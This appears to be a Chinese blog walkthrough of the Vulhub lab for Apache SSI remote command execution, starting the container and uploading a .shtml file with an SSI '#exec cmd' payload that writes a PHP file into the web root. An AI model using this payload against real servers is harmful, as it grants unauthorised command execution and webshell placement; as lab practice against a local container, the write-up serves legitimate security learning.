vulhub中的Apache SSI 远程命令执行漏洞

爱喝水的泡泡2024-01-09 11:42

Apache SSI 远程命令执行漏洞

1.cd到ssi-rce

cd /opt/vulhub/httpd/ssi-rce/

2.执行docker-compose up -d

docker-compose up -d

3.查看靶场是否开启成功

dooker ps

拉取成功了

4.访问url

这里已经执行成功了,注意这里需要加入/upload.php

5.写入一句话木马

<!--#exec cmd="echo '<?php phpinfo(); ?>' > /var/www/html/this.php" -->

6.提交查询

7.点击shell.shtml

8.查看是否写入成功

docker exec -it ssi-rce_apache_1 /bin/bash

9.获取phpinfo

相关推荐
vortex52 天前
基于 Apache 规则拦截目录扫描器请求:实测与配置指南
linux·网络安全·apache
观望过往2 天前
Apache IoTDB 连续查询(CQ)全解析
apache·iotdb
世界尽头与你2 天前
CVE-2020-1938_ Apache Tomcat AJP 文件读取与包含漏洞
java·网络安全·渗透测试·tomcat·apache
SelectDB技术团队2 天前
Apache Doris 在小米统一 OLAP 和湖仓一体的实践
数据仓库·数据分析·apache·数据库开发
过往记忆2 天前
Apache XTable:打破数据湖格式孤岛的“通用翻译官”
apache
耿雨飞2 天前
Apache Airflow 第四章:生态扩展与插件开发
apache·airflow
渣渣盟3 天前
Flink数据流高效写入HBase实战
大数据·flink·scala·apache·hbase
n***84073 天前
防火墙安全策略(基本配置)
服务器·php·apache
顧棟3 天前
Apache POI导出出现FontConfiguration中NULL
apache
FreeBuf_3 天前
高危警报:Apache Kvrocks ‘RESET‘ 命令漏洞可获取管理员权限
apache
热门推荐
01GitHub 镜像站点02【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)03UV安装并设置国内源04React CVE-2025-55182漏洞排查与修复指南05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06BongoCat - 跨平台键盘猫动画工具07本地部署阿里最新开源的Z-Image08Linux下V2Ray安装配置指南09Labelme从安装到标注:零基础完整指南10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)